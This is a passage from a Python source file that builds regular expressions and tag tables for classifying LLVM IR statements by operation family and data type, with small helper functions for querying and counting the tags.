local_id = '%' + local_id_no_perc
local_or_global_id = r'(' + global_id + r'|' + local_id + r')'
# Options and linkages
linkage = any_of([' private', ' external', ' internal', ' linkonce_odr', ' appending', ' external', ' internal',
' unnamed_addr', ' common', ' hidden', ' weak', ' linkonce', ' extern_weak', ' weak_odr', ' private',
' available_externally', ' local_unnamed_addr', ' thread_local', ' linker_private'])
# Immediate values
immediate_value_ad_hoc = r'#[\d\w]+'
immediate_value_true = r'true'
immediate_value_false = r'false'
immediate_value_bool = r'(?:' + immediate_value_true + r'|' + immediate_value_false + r')'
immediate_value_int = r'(?<!\w)[-]?[0-9]+'
immediate_value_float_sci = r'(?<!\w)[-]?[0-9]+\.[0-9]+(?:e\+?-?[0-9]+)?'
immediate_value_float_hexa = r'(?<!\w)[-]?0[xX][hklmHKLM]?[A-Fa-f0-9]+'
immediate_value_float = r'(?:' + immediate_value_float_sci + '|' + immediate_value_float_hexa + ')'
immediate_value_vector_bool = r'<i1 ' + immediate_value_bool + r'(?:, i1 (?:' + immediate_value_bool + '|undef))*>'
immediate_value_vector_int = r'<i\d+ ' + immediate_value_int + r'(?:, i\d+ (?:' + immediate_value_int + '|undef))*>'
immediate_value_vector_float = r'<float ' + immediate_value_float + r'(?:, float (?:' + immediate_value_float + \
'|undef))*>'
immediate_value_vector_double = r'<double ' + immediate_value_float + r'(?:, double (?:' + immediate_value_float + \
'|undef))*>'
immediate_value_string = r'(?<!\w)c".+"'
immediate_value_misc = r'(?:null|zeroinitializer)'
immediate_value = any_of([immediate_value_true, immediate_value_false,
immediate_value_int, immediate_value_float_sci, immediate_value_float_hexa,
immediate_value_string, immediate_value_misc])
immediate_value_undef = r'undef'
immediate_value_or_undef = any_of([immediate_value_true, immediate_value_false,
immediate_value_int, immediate_value_float_sci, immediate_value_float_hexa,
immediate_value_string,
immediate_value_misc, immediate_value_ad_hoc, immediate_value_undef])
# Combos
immediate_or_local_id = any_of([immediate_value_true, immediate_value_false,
immediate_value_int, immediate_value_float_sci, immediate_value_float_hexa,
immediate_value_vector_int, immediate_value_vector_float, immediate_value_vector_double,
local_id, immediate_value_misc])
immediate_or_local_id_or_undef = any_of([immediate_value_true, immediate_value_false,
immediate_value_int, immediate_value_float_sci, immediate_value_float_hexa,
immediate_value_vector_int, immediate_value_vector_float,
immediate_value_vector_double,
local_id, immediate_value_misc, immediate_value_undef])
# Names of aggregate types
# Lookahead so that names like '%struct.attribute_group**' won't be matched as just %struct.attribute
struct_lookahead = r'(?=[\s,\*\]\}])'
struct_name_add_on = '(?:\([\w\d=]+\)")?'
struct_name_without_lookahead = \
'%[\"\@\d\w\.\-\_:]+(?:(?:<[\"\@\d\w\.\-\_:,<>\(\) \*]+>|\([\"\@\d\w\.\-\_:,<> \*]+\)|\w+)?::[\" \@\d\w\.\-\_:\)\(]*)*' \
+ struct_name_add_on
struct_name = struct_name_without_lookahead + struct_lookahead
# Functions
func_name = r'@[\"\w\d\._\$\\]+'
func_call_pattern = r'.* @[\w\d\._]+'
func_call_pattern_or_bitcast = r'(.* @[\w\d\._]+|.*bitcast .* @[\w\d\._]+ to .*)'
# new basic block
start_basic_block = r'((?:<label>:)?(' + local_id_no_perc + r'):|; <label>:' + local_id_no_perc + r' )'
# Types
base_type = r'(?:i\d+|double|float|opaque)\**'
first_class_types = ['i\d+', 'half', 'float', 'double', 'fp_128', 'x86_fp80', 'ppc_fp128', '<%ID>']
first_class_type = any_of(first_class_types) + '\**'
base_type_or_struct_name = any_of([base_type, struct_name_without_lookahead])
ptr_to_base_type = base_type + r'\*+'
vector_type = r'<\d+ x ' + base_type + r'>'
ptr_to_vector_type = vector_type + r'\*+'
array_type = r'\[\d+ x ' + base_type + r'\]'
ptr_to_array_type = array_type + r'\*+'
array_of_array_type = '\[\d+ x ' + '\[\d+ x ' + base_type + '\]' + '\]'
struct = struct_name_without_lookahead
ptr_to_struct = struct + r'\*+'
function_type = base_type + ' \(' + any_of([base_type, vector_type, array_type, '...'], ',') + '*' + \
any_of([base_type, vector_type, array_type, '...']) + '\)\**'
any_type = any_of([base_type, ptr_to_base_type, vector_type, ptr_to_vector_type, array_type, ptr_to_array_type])
any_type_or_struct = any_of([base_type, ptr_to_base_type, vector_type, ptr_to_vector_type, array_type,
ptr_to_array_type, ptr_to_struct])
structure_entry = any_of([base_type, vector_type, array_type, array_of_array_type, function_type, r'{ .* }\**'])
structure_entry_with_comma = any_of([base_type, vector_type, array_type, array_of_array_type, function_type], ',')
literal_structure = '(<?{ ' + structure_entry_with_comma + '*' + structure_entry + ' }>?|{})'
# Tokens
unknown_token = '!UNK' # starts with '!' to guarantee it will appear first in the alphabetically sorted vocabulary
########################################################################################################################
# Tags for clustering statements (by statement semantics) and helper functions
########################################################################################################################
# List of families of operations
llvm_IR_stmt_families = [
# ["tag level 1", "tag level 2", "tag level 3", "regex" ]
["unknown token", "unknown token", "unknown token", '!UNK'],
["integer arithmetic", "addition", "add integers", "<%ID> = add .*"],
["integer arithmetic", "subtraction", "subtract integers", "<%ID> = sub .*"],
["integer arithmetic", "multiplication", "multiply integers", "<%ID> = mul .*"],
["integer arithmetic", "division", "unsigned integer division", "<%ID> = udiv .*"],
["integer arithmetic", "division", "signed integer division", "<%ID> = sdiv .*"],
["integer arithmetic", "remainder", "remainder of signed div", "<%ID> = srem .*"],
["integer arithmetic", "remainder", "remainder of unsigned div.", "<%ID> = urem .*"],
["floating-point arithmetic", "addition", "add floats", "<%ID> = fadd .*"],
["floating-point arithmetic", "subtraction", "subtract floats", "<%ID> = fsub .*"],
["floating-point arithmetic", "multiplication", "multiply floats", "<%ID> = fmul .*"],
["floating-point arithmetic", "division", "divide floats", "<%ID> = fdiv .*"],
["bitwise arithmetic", "and", "and", "<%ID> = and .*"],
["bitwise arithmetic", "or", "or", "<%ID> = or .*"],
["bitwise arithmetic", "xor", "xor", "<%ID> = xor .*"],
["bitwise arithmetic", "shift left", "shift left", "<%ID> = shl .*"],
["bitwise arithmetic", "arithmetic shift right", "ashr", "<%ID> = ashr .*"],
["bitwise arithmetic", "logical shift right", "logical shift right", "<%ID> = lshr .*"],
["comparison operation", "compare integers", "compare integers", "<%ID> = icmp .*"],
["comparison operation", "compare floats", "compare floats", "<%ID> = fcmp .*"],
["conversion operation", "bitcast", "bitcast single val",
'<%ID> = bitcast (i\d+|float|double|x86_fp80|opaque) .* to .*'],
["conversion operation", "bitcast", "bitcast single val*",
'<%ID> = bitcast (i\d+|float|double|x86_fp80|opaque)\* .* to .*'],
["conversion operation", "bitcast", "bitcast single val**",
'<%ID> = bitcast (i\d+|float|double|x86_fp80|opaque)\*\* .* to .*'],
["conversion operation", "bitcast", "bitcast single val***",
'<%ID> = bitcast (i\d+|float|double|x86_fp80|opaque)\*\*\* .* to .*'],
["conversion operation", "bitcast", "bitcast single val****",
'<%ID> = bitcast (i\d+|float|double|x86_fp80|opaque)\*\*\*\* .* to .*'],
["conversion operation", "bitcast", "bitcast array", '<%ID> = bitcast \[\d.* to .*'],
["conversion operation", "bitcast", "bitcast vector", '<%ID> = bitcast <\d.* to .*'],
["conversion operation", "bitcast", "bitcast structure", '<%ID> = bitcast (%"|<{|<%|{).* to .*'],
["conversion operation", "bitcast", "bitcast void", '<%ID> = bitcast void '],
["conversion operation", "extension/truncation", "extend float", "<%ID> = fpext .*"],
["conversion operation", "extension/truncation", "truncate floats", "<%ID> = fptrunc .*"],
["conversion operation", "extension/truncation", "sign extend ints", "<%ID> = sext .*"],
["conversion operation", "extension/truncation", "truncate int to ... ", "<%ID> = trunc .* to .*"],
["conversion operation", "extension/truncation", "zero extend integers", "<%ID> = zext .*"],
["conversion operation", "convert", "convert signed integers to... ", "<%ID> = sitofp .*"],
["conversion operation", "convert", "convert unsigned integer to... ", "<%ID> = uitofp .*"],
["conversion operation", "convert int to ptr", "convert int to ptr", "<%ID> = inttoptr .*"],
["conversion operation", "convert ptr to int", "convert ptr to int", "<%ID> = ptrtoint .*"],
["conversion operation", "convert floats", "convert float to sint", "<%ID> = fptosi .*"],
["conversion operation", "convert floats", "convert float to uint", "<%ID> = fptoui .*"],
["control flow", "phi", "phi", "<%ID> = phi .*"],
["control flow", "switch", "jump table line", "i\d{1,2} <(INT|FLOAT)>, label <%ID>"],
["control flow", "select", "select", "<%ID> = select .*"],
["control flow", "invoke", "invoke and ret type", "<%ID> = invoke .*"],
["control flow", "invoke", "invoke void", "invoke (fastcc )?void .*"],
["control flow", "branch", "branch conditional", "br i1 .*"],
["control flow", "branch", "branch unconditional", "br label .*"],
["control flow", "branch", "branch indirect", "indirectbr .*"],
["control flow", "control flow", "switch", "switch .*"],
["control flow", "return", "return", "ret .*"],
["control flow", "resume", "resume", "resume .*"],
["control flow", "unreachable", "unreachable", "unreachable.*"],
["control flow", "exception handling", "catch block", "catch .*"],
["control flow", "exception handling", "cleanup clause", "cleanup"],
["control flow", "exception handling", "landingpad for exceptions", "<%ID> = landingpad ."],
["function", "function call", "sqrt (llvm-intrinsic)",
"<%ID> = (tail |musttail |notail )?call (fast |)?(i\d+|float|double|x86_fp80|<%ID>|<\d x float>|<\d x double>) @(llvm|llvm\..*)\.sqrt.*"],
["function", "function call", "fabs (llvm-intr.)",
"<%ID> = (tail |musttail |notail )?call (fast |)?(i\d+|float|double|x86_fp80|<%ID>|<\d x float>|<\d x double>|<\d x i\d+>) @(llvm|llvm\..*)\.fabs.*"],
["function", "function call", "max (llvm-intr.)",
"<%ID> = (tail |musttail |notail )?call (fast |)?(i\d+|float|double|x86_fp80|<%ID>|<\d x float>|<\d x double>|<\d x i\d+>) @(llvm|llvm\..*)\.max.*"],
["function", "function call", "min (llvm-intr.)",
"<%ID> = (tail |musttail |notail )?call (fast |)?(i\d+|float|double|x86_fp80|<%ID>|<\d x float>|<\d x double>|<\d x i\d+>) @(llvm|llvm\..*)\.min.*"],
["function", "function call", "fma (llvm-intr.)",
"<%ID> = (tail |musttail |notail )?call (fast |)?(i\d+|float|double|x86_fp80|<%ID>|<\d x float>|<\d x double>|<\d x i\d+>) @(llvm|llvm\..*)\.fma.*"],
["function", "function call", "phadd (llvm-intr.)",
"<%ID> = (tail |musttail |notail )?call (fast |)?(i\d+|float|double|x86_fp80|<%ID>|<\d x float>|<\d x double>|<\d x i\d+>) @(llvm|llvm\..*)\.phadd.*"],
["function", "function call", "pabs (llvm-intr.)",
"<%ID> = (tail |musttail |notail )?call (fast |)?(i\d+|float|double|x86_fp80|<%ID>|<\d x float>|<\d x double>|<\d x i\d+>) @(llvm|llvm\..*)\.pabs.*"],
["function", "function call", "pmulu (llvm-intr.)",
"<%ID> = (tail |musttail |notail )?call (fast |)?(i\d+|float|double|x86_fp80|<%ID>|<\d x float>|<\d x double>|<\d x i\d+>) @(llvm|llvm\..*)\.pmulu.*"],
["function", "function call", "umul (llvm-intr.)", "<%ID> = (tail |musttail |notail )?call {.*} @llvm\.umul.*"],
["function", "function call", "prefetch (llvm-intr.)", "(tail |musttail |notail )?call void @llvm\.prefetch.*"],
["function", "function call", "trap (llvm-intr.)", "(tail |musttail |notail )?call void @llvm\.trap.*"],
["function", "func decl / def", "function declaration", "declare .*"],
["function", "func decl / def", "function definition", "define .*"],
["function", "function call", "function call void",
"(tail |musttail |notail )?call( \w+)? void [\w\)\(\}\{\.\,\*\d\[\]\s<>%]*(<[@%]ID>\(|.*bitcast )"],
["function", "function call", "function call mem lifetime",
"(tail |musttail |notail )?call( \w+)? void ([\w)(\.\,\*\d ])*@llvm\.lifetime.*"],
["function", "function call", "function call mem copy",
"(tail |musttail |notail )?call( \w+)? void ([\w)(\.\,\*\d ])*@llvm\.memcpy\..*"],
["function", "function call", "function call mem set",
"(tail |musttail |notail )?call( \w+)? void ([\w)(\.\,\*\d ])*@llvm\.memset\..*"],
["function", "function call", "function call single val",
'<%ID> = (tail |musttail |notail )?call[^{]* (i\d+|float|double|x86_fp80|<\d+ x (i\d+|float|double)>) (.*<[@%]ID>\(|(\(.*\) )?bitcast ).*'],
["function", "function call", "function call single val*",
'<%ID> = (tail |musttail |notail )?call[^{]* (i\d+|float|double|x86_fp80)\* (.*<[@%]ID>\(|\(.*\) bitcast ).*'],
["function", "function call", "function call single val**",
'<%ID> = (tail |musttail |notail )?call[^{]* (i\d+|float|double|x86_fp80)\*\* (.*<[@%]ID>\(|\(.*\) bitcast ).*'],
["function", "function call", "function call array",
'<%ID> = (tail |musttail |notail )?call[^{]* \[.*\] (\(.*\) )?(<[@%]ID>\(|\(.*\) bitcast )'],
["function", "function call", "function call array*",
'<%ID> = (tail |musttail |notail )?call[^{]* \[.*\]\* (\(.*\) )?(<[@%]ID>\(|\(.*\) bitcast )'],
["function", "function call", "function call array**",
'<%ID> = (tail |musttail |notail )?call[^{]* \[.*\]\*\* (\(.*\) )?(<[@%]ID>\(|\(.*\) bitcast )'],
["function", "function call", "function call structure",
'<%ID> = (tail |musttail |notail )?call[^{]* (\{ .* \}[\w\_]*|<?\{ .* \}>?|opaque|\{\}|<%ID>) (\(.*\)\*? )?(<[@%]ID>\(|\(.*\) bitcast )'],
["function", "function call", "function call structure*",
'<%ID> = (tail |musttail |notail )?call[^{]* (\{ .* \}[\w\_]*|<?\{ .* \}>?|opaque|\{\}|<%ID>)\* (\(.*\)\*? )?(<[@%]ID>\(|\(.*\) bitcast )'],
["function", "function call", "function call structure**",
'<%ID> = (tail |musttail |notail )?call[^{]* (\{ .* \}[\w\_]*|<?\{ .* \}>?|opaque|\{\}|<%ID>)\*\* (\(.*\)\*? )?(<[@%]ID>\(|\(.*\) bitcast )'],
["function", "function call", "function call structure***",
'<%ID> = (tail |musttail |notail )?call[^{]* (\{ .* \}[\w\_]*|<?\{ .* \}>?|opaque|\{\}|<%ID>)\*\*\* (\(.*\)\*? )?(<[@%]ID>\(|\(.*\) bitcast )'],
["function", "function call", "function call asm value", '<%ID> = (tail |musttail |notail )?call.* asm .*'],
["function", "function call", "function call asm void", '(tail |musttail |notail )?call void asm .*'],
["function", "function call", "function call function",
'<%ID> = (tail |musttail |notail )?call[^{]* void \([^\(\)]*\)\** <[@%]ID>\('],
["global variables", "glob. var. definition", "???", "<@ID> = (?!.*constant)(?!.*alias).*"],
["global variables", "constant definition", "???", "<@ID> = .*constant .*"],
["memory access", "load from memory", "load structure", '<%ID> = load (\w* )?(%"|<\{|\{ <|\{ \[|\{ |<%|opaque).*'],
["memory access", "load from memory", "load single val", '<%ID> = load (\w* )?(i\d+|float|double|x86_fp80)[, ].*'],
["memory access", "load from memory", "load single val*",
'<%ID> = load (\w* )?(i\d+|float|double|x86_fp80)\*[, ].*'],
["memory access", "load from memory", "load single val**",
'<%ID> = load (\w* )?(i\d+|float|double|x86_fp80)\*\*[, ].*'],
["memory access", "load from memory", "load single val***",
'<%ID> = load (\w* )?(i\d+|float|double|x86_fp80)\*\*\*[, ].*'],
["memory access", "load from memory", "load single val****",
'<%ID> = load (\w* )?(i\d+|float|double|x86_fp80)\*\*\*\*[, ].*'],
["memory access", "load from memory", "load single val*****",
'<%ID> = load (\w* )?(i\d+|float|double|x86_fp80)\*\*\*\*\*[, ].*'],
["memory access", "load from memory", "load single val******",
'<%ID> = load (\w* )?(i\d+|float|double|x86_fp80)\*\*\*\*\*\*[, ].*'],
["memory access", "load from memory", "load single val*******",
'<%ID> = load (\w* )?(i\d+|float|double|x86_fp80)\*\*\*\*\*\*\*[, ].*'],
["memory access", "load from memory", "load vector", '<%ID> = load <\d+ x .*'],
["memory access", "load from memory", "load array", '<%ID> = load \[\d.*'],
["memory access", "load from memory", "load fction ptr", '<%ID> = load void \('],
["memory access", "store", "store", 'store.*'],
["memory addressing", "GEP", "GEP", "<%ID> = getelementptr .*"],
["memory allocation", "allocate on stack", "allocate structure", '<%ID> = alloca (%"|<{|<%|{ |opaque).*'],
["memory allocation", "allocate on stack", "allocate vector", "<%ID> = alloca <\d.*"],
["memory allocation", "allocate on stack", "allocate array", "<%ID> = alloca \[\d.*"],
["memory allocation", "allocate on stack", "allocate single value", "<%ID> = alloca (double|float|i\d{1,3})\*?.*"],
["memory allocation", "allocate on stack", "allocate void", "<%ID> = alloca void \(.*"],
["memory atomics", "atomic memory modify", "atomicrw xchg", "<%ID> = atomicrmw.* xchg .*"],
["memory atomics", "atomic memory modify", "atomicrw add", "<%ID> = atomicrmw.* add .*"],
["memory atomics", "atomic memory modify", "atomicrw sub", "<%ID> = atomicrmw.* sub .*"],
["memory atomics", "atomic memory modify", "atomicrw or", "<%ID> = atomicrmw.* or .*"],
["memory atomics", "atomic compare exchange", "cmpxchg single val",
"<%ID> = cmpxchg (weak )?(i\d+|float|double|x86_fp80)\*"],
["non-instruction", "label", "label declaration", "; <label>:.*(\s+; preds = <LABEL>)?"],
["non-instruction", "label", "label declaration", "<LABEL>:( ; preds = <LABEL>)?"],
["value aggregation", "extract value", "extract value", "<%ID> = extractvalue .*"],
["value aggregation", "insert value", "insert value", "<%ID> = insertvalue .*"],
["vector operation", "insert element", "insert element", "<%ID> = insertelement .*"],
["vector operation", "extract element", "extract element", "<%ID> = extractelement .*"],
["vector operation", "shuffle vector", "shuffle vector", "<%ID> = shufflevector .*"]
]
# Helper functions for exploring llvm_IR_families
def get_list_tag_level_1():
    """
    Get the list of all level-1 tags in the data structure llvm_IR_stmt_families

    :return: list containing strings corresponding to all level 1 tags
    """
    # Column 0 of each family entry is its level-1 tag; deduplicate via a set.
    return list({family[0] for family in llvm_IR_stmt_families})
def get_list_tag_level_2(tag_level_1='all'):
    """
    Get the list of all level-2 tags in the data structure llvm_IR_stmt_families
    corresponding to the string given as an input, or absolutely all of them
    if input == 'all'

    :param tag_level_1: string containing the level-1 tag to query, or 'all'
    :return: list of strings
    """
    # Make sure the input parameter is valid
    assert tag_level_1 in get_list_tag_level_1() or tag_level_1 == 'all', tag_level_1 + ' invalid'
    if tag_level_1 == 'all':
        tags = {family[1] for family in llvm_IR_stmt_families}
    else:
        tags = {family[1] for family in llvm_IR_stmt_families if family[0] == tag_level_1}
    # Like the original, the result order is arbitrary (set-derived).
    return list(tags)
def get_list_tag_level_3(tag_level_2='all'):
    """
    Get the list of all level-3 tags in the data structure llvm_IR_families
    corresponding to the string given as an input, or absolutely all of them
    if input == 'all'
    :param tag_level_2: string containing the level-2 tag to query, or 'all'
    :return: list of unique level-3 tag strings (sorted when querying 'all')
    """
    # Make sure the input parameter is valid
    assert tag_level_2 in get_list_tag_level_2() or tag_level_2 == 'all'
    if tag_level_2 == 'all':
        # Bug fix: the original sorted the tags and then re-wrapped the result in
        # list(set(...)), which discarded the ordering. Return the sorted,
        # de-duplicated list directly.
        return sorted({fam[2] for fam in llvm_IR_stmt_families})
    # Only keep level-3 tags whose family matches the requested level-2 tag.
    return list({fam[2] for fam in llvm_IR_stmt_families if fam[1] == tag_level_2})
def get_count(data, tag, level):
    """
    Count the total number of occurrences of a given tag at a certain level
    :param data: dict mapping statement strings to their occurrence counts
    :param tag: tag string whose occurrences should be counted
    :param level: tag level to query (1, 2 or 3)
    :return: total count of statements in `data` whose key matches the regex
             (fam[3]) of any family carrying `tag` at the given level
    """
    # Make sure the input is valid
    assert level in [1, 2, 3]
    # Validate the tag against the tag list for the requested level.
    tag_lists = {1: get_list_tag_level_1, 2: get_list_tag_level_2, 3: get_list_tag_level_3}
    assert tag in tag_lists[level]()
    # The level-N tag is stored at index N-1 of each family entry, and the
    # family's matching regex at index 3 — this collapses the three previously
    # duplicated per-level branches into one loop.
    count = 0
    for fam in llvm_IR_stmt_families:
        if fam[level - 1] == tag:
            # Count occurrences in data of statements matching this regex
            for key, value in data.items():
                if re.match(fam[3], key):
                    count += value
    return count
########################################################################################################################
# Tags for clustering statements (by statement type)
########################################################################################################################
# Helper lists: building blocks for the regex alternations assembled below.
# Base integer and floating-point LLVM types.
types_int = ['i1', 'i8', 'i16', 'i32', 'i64']
types_flpt = ['half', 'float', 'double', 'fp128', 'x86_fp80', 'ppc_fp128']
# Optional instruction flags/qualifiers (each carries its trailing space so it
# can be concatenated directly into a regex alternative).
fast_math_flag = ['', 'nnan ', 'ninf ', 'nsz ', 'arcp ', 'contract ', 'afn ', 'reassoc ', 'fast ']
opt_load = ['atomic ', 'volatile ']
opt_addsubmul = ['nsw ', 'nuw ', 'nuw nsw ']
opt_usdiv = ['', 'exact ']
opt_icmp = ['eq ', 'ne ', 'ugt ', 'uge ', 'ult ', 'ule ', 'sgt ', 'sge ', 'slt ', 'sle ']
# fcmp condition codes. Bug fix: the original listed 'olt ' twice, which only
# produced a redundant alternative in the generated regex.
opt_fcmp = ['false ', 'oeq ', 'ogt ', 'oge ', 'olt ', 'ole ', 'one ', 'ord ', 'ueq ', 'ugt ',
            'uge ', 'ult ', 'ule ', 'une ', 'uno ', 'true ']
# Function-definition attributes. Bug fix: duplicate 'linkonce_odr ' removed.
# Raw strings used for entries containing regex escapes (values are unchanged).
opt_define = ['', 'linkonce_odr ', 'zeroext ', r'dereferenceable\(\d+\) ', 'hidden ', 'internal ',
              'nonnull ', 'weak_odr ', 'fastcc ', 'noalias ', 'signext ', 'spir_kernel ']
opt_invoke = ['', r'dereferenceable\(\d+\) ', 'noalias ', 'fast ', 'zeroext ', 'signext ', 'fastcc ']
opt_GEP = ['', 'inbounds ']
# Helper functions
def any_of(possibilities, to_add=''):
    """
    Construct a regex representing "any of" the given possibilities
    :param possibilities: list of strings representing different word possibilities
    :param to_add: string appended (together with a trailing space) after each
                   possibility (optional) — note: the original docstring wrongly
                   said it was added at the beginning
    :return: string corresponding to regex which represents any of the given possibilities
    """
    assert len(possibilities) > 0
    if to_add:
        # Each alternative becomes "<possibility><to_add> ".
        alternatives = [p + to_add + ' ' for p in possibilities]
    else:
        alternatives = possibilities
    # Join with '|' inside a single regex group.
    return '(' + '|'.join(alternatives) + ')'
# Main tags
llvm_IR_stmt_tags = [
# ['regex' 'tag' 'tag general'
['<@ID> = (?!.*constant)(?!.*alias).*', 'global definition', 'global variable definition'],
['<@ID> = .*constant .*', 'global const. def.', 'global variable definition'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?i1 .*', 'i1 operation', 'int operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?i2 .*', 'i2 operation', 'int operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?i4 .*', 'i4 operation', 'int operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?i8 .*', 'i8 operation', 'int operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?i16 .*', 'i16 operation', 'int operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?i32 .*', 'i32 operation', 'int operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?i64 .*', 'i64 operation', 'int operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?i128 .*', 'i128 operation', 'int operation'],
['<%ID> = add ' + any_of(opt_addsubmul) + '?<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?i1 .*', 'i1 operation', 'int operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?i2 .*', 'i2 operation', 'int operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?i4 .*', 'i4 operation', 'int operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?i8 .*', 'i8 operation', 'int operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?i16 .*', 'i16 operation', 'int operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?i32 .*', 'i32 operation', 'int operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?i64 .*', 'i64 operation', 'int operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?i128 .*', 'i128 operation', 'int operation'],
['<%ID> = sub ' + any_of(opt_addsubmul) + '?<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?i1 .*', 'i1 operation', 'int operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?i2 .*', 'i2 operation', 'int operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?i4 .*', 'i4 operation', 'int operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?i8 .*', 'i8 operation', 'int operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?i16 .*', 'i16 operation', 'int operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?i32 .*', 'i32 operation', 'int operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?i64 .*', 'i64 operation', 'int operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?i128 .*', 'i128 operation', 'int operation'],
['<%ID> = mul ' + any_of(opt_addsubmul) + '?<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?i1 .*', 'i1 operation', 'int operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?i2 .*', 'i2 operation', 'int operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?i4 .*', 'i4 operation', 'int operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?i8 .*', 'i8 operation', 'int operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?i16 .*', 'i16 operation', 'int operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?i32 .*', 'i32 operation', 'int operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?i64 .*', 'i64 operation', 'int operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?i128 .*', 'i128 operation', 'int operation'],
['<%ID> = udiv ' + any_of(opt_usdiv) + '?<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?i1 .*', 'i1 operation', 'int operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?i2 .*', 'i2 operation', 'int operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?i4 .*', 'i4 operation', 'int operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
